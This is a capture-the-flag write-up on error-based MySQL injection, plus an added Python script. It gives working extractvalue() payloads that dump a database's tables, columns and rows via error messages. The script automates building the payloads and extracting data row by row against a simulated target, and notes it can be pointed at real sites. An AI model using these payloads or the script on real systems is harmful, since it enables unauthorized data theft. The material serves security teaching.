Challenge:
This is a manual-injection practice challenge, intended for practising manual injection based on MySQL error messages. sqlmap will certainly solve it, so there is no need to try that. The flag does not contain key or #.
Writeup:
The challenge states up front that this is manual injection based on MySQL error messages.
- Opening the challenge returns the following page:
username:admin status:ok
Appending a single quote to the parameter (?username=admin') returns:
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' limit 1' at line 1
username:admin' status:ok
The telling part is ''admin'' limit 1': our quote closed the string literal early, and the leftover ' limit 1 is what MySQL choked on. The PHP warnings confirm that the query failed (mysql_query() returned false) and that the page echoes the raw MySQL error, which is exactly what error-based injection needs.
From this the backend query is roughly (table stands in for the real table name), with $_GET['username'] interpolated directly into the string:
select * from table where username='$_GET['username']' limit 1
- There are many ways to do error-based injection (this blog post collects them: http://www.2cto.com/database/201410/344310.html); here is one using the extractvalue() function:
?username=admin' and extractvalue(rand(),concat(0x3a,(subquery)))%23
Why it works: extractvalue(xml, xpath) raises "XPATH syntax error: '...'" whenever the XPath expression is invalid, and it quotes the expression in the error. Prefixing the subquery result with 0x3a (a colon) guarantees the expression is invalid, so whatever the subquery returns is echoed back on the page. The first argument is irrelevant (rand() is just a placeholder), and %23 is a URL-encoded # that comments out the trailing ' limit 1 of the original query. One caveat to keep in mind: MySQL only reports the first 32 characters of the bad XPath expression, so long results get cut off.
- Dump the table names:
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
XPATH syntax error: ':log,motto,user'
username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))# status:ok
This reveals three tables: log, motto and user.
- Dump the column names (using motto as the example):
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))%23
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
XPATH syntax error: ':id,username,motto'
username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))# status:ok
The columns are id, username and motto. (Note that this query does not filter on table_schema, so on a server with another database that also has a motto table the list would include that table's columns too.)
- Dump the values of each column:
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))%23
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
XPATH syntax error: ':mymotto,happy everyday,nothing '
username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))# status:ok
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))%23
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
XPATH syntax error: ':admin,guest,test,#adf#ad@@#'
username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))# status:ok
Comparing the two results, the username column returned one more value than the motto column, which suggests the flag may be in the value that did not show up (there should be a way to know this in advance; I only found it by comparing the two outputs, as a beginner whose injection technique is still limited).
The output itself shows what happened: ':mymotto,happy everyday,nothing ' is exactly 32 characters, the cap on the XPath expression quoted in the error message, so the fourth motto was truncated rather than absent, whereas the username list is only 28 characters and fit in full. Whenever an extractvalue() result is exactly 32 characters long, assume it was cut off.
- Build another query that uses limit to fetch the rows one at a time:
?username=admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))%23
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
XPATH syntax error: ':key#notfound!#:'
username:admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))# status:ok
The trailing 0x3a appended to the value acts as a sentinel: because the closing ':' arrived, we know the fourth row was delivered in full and not cut at the 32-character limit.
Following the hint in the challenge, strip key and the # characters from this value to get the flag!
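The whole procedure above, as an added example that is not code from the original writeup: it builds the extractvalue() payloads in the writeup's template, parses the leaked value out of the error page, and runs the two dump strategies (one-shot group_concat() versus limit n,1 with a trailing sentinel) against a simulated copy of the target so everything executes offline. The simulated target (FakeTarget, built on sqlite3 with shims for rand(), concat(), hex literals, # comments and extractvalue()), its table contents and its page layout are constructed assumptions modelled on what the writeup observed, not the real challenge; the 32-character cap is real MySQL behaviour and is what makes the group_concat() dump lose the fourth motto.

```python
"""Error-based injection via extractvalue(), run against a simulated target.
Added example: the target, its data and the page format are constructed
assumptions that mirror the writeup; the 32-char cap is real MySQL behaviour."""
import re
import sqlite3
from urllib.parse import parse_qs, quote, urlparse

XPATH_LIMIT = 32   # MySQL quotes at most 32 chars of the bad XPath in the error text
ERR_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def build_payload(subquery):
    """URL query string for one extractvalue() probe, in the writeup's template.
    0x3a (':') in front of the subquery result makes the XPath invalid so MySQL
    raises an error quoting it; '#' (%23) comments out the trailing ' limit 1."""
    injected = f"admin' and extractvalue(rand(),concat(0x3a,({subquery})))#"
    return "?username=" + quote(injected, safe="(),'=*")


def leaked_value(page):
    """Pull the quoted XPath out of the page and drop the leading ':'.
    None means no XPATH error fired, e.g. the subquery returned no row (NULL).
    Assumes the leaked data itself contains no single quote."""
    m = ERR_RE.search(page)
    return m.group(1)[1:] if m else None


class FakeTarget:
    """Stand-in for the vulnerable PHP page: sqlite3 in memory plus shims for the
    MySQL features the payload relies on. Constructed data, not the real challenge."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            create table user(username text, status text);
            insert into user values ('admin', 'ok');
            create table motto(id integer, username text, motto text);
            insert into motto values (1, 'admin', 'mymotto'), (2, 'guest', 'happy everyday'),
                                     (3, 'test', 'nothing '), (4, '#adf#ad@@#', 'key#notfound!#');
        """)
        self.err = None
        self.db.create_function("rand", 0, lambda: 0.5)
        self.db.create_function("concat", -1,
                                lambda *a: None if None in a else "".join(str(x) for x in a))
        self.db.create_function("extractvalue", 2, self._extractvalue)

    def _extractvalue(self, xml, xpath):
        # MySQL returns NULL quietly for a NULL XPath, but rejects one starting
        # with ':' and reports only its first 32 characters in the error.
        if xpath is None:
            return None
        self.err = xpath[:XPATH_LIMIT]
        raise ValueError("XPATH syntax error")   # surfaces as sqlite3.OperationalError

    def get(self, query_string):
        """Serve one request the way the writeup's index.php does (no escaping)."""
        username = parse_qs(urlparse(query_string).query)["username"][0]
        sql = f"select * from user where username='{username}' limit 1"
        sql = sql.split("#", 1)[0]   # '#' opens a comment in MySQL; sqlite needs it cut
        # MySQL reads 0x3a as the string ':' in string context; sqlite does not.
        sql = re.sub(r"0x([0-9a-fA-F]+)",
                     lambda m: "'" + bytes.fromhex(m.group(1)).decode() + "'", sql)
        self.err = None
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error as e:
            if self.err is None:   # plain syntax error, e.g. the unbalanced-quote probe
                return f"You have an error in your SQL syntax: {e} username:{username} status:ok"
            return f"XPATH syntax error: '{self.err}' username:{username} status:ok"
        return f"username:{row[0]} status:{row[1]}" if row else "username: status:"


def group_concat_leak(target, table, column):
    """One-shot dump like the writeup's. Returns (value, complete): complete is False
    when ':' + value already fills the 32-char window, so the tail may be cut off."""
    got = leaked_value(target.get(build_payload(f"select group_concat({column}) from {table}")))
    return got, got is not None and len(got) + 1 < XPATH_LIMIT


def dump_column(target, table, column):
    """Row-by-row extraction with limit n,1 and a trailing sentinel (0x7c = '|'):
    a row whose sentinel is missing was truncated and must not be accepted as-is."""
    values, n = [], 0
    while True:
        got = leaked_value(target.get(build_payload(
            f"select concat({column},0x7c) from {table} limit {n},1")))
        if got is None:              # NULL: no row at this offset, we are done
            return values
        if not got.endswith("|"):
            raise ValueError(f"row {n} truncated at {XPATH_LIMIT} chars: {got!r}")
        values.append(got[:-1])
        n += 1


if __name__ == "__main__":
    t = FakeTarget()
    print(group_concat_leak(t, "motto", "motto"))      # cut at 32 chars, complete=False
    print(group_concat_leak(t, "motto", "username"))   # 28 chars, complete=True
    print(dump_column(t, "motto", "motto"))            # all four rows, sentinel-checked
```

The sentinel in dump_column() is the general form of the trailing 0x3a the writeup appended in its last query: the value is trusted only if the marker survives the 32-character window, so a row longer than 30 characters raises instead of silently yielding a prefix (for such rows you would page through it with substring() or switch to a technique without the cap, which is outside this writeup). Against a real target, replace FakeTarget.get() with an HTTP GET of the same query string.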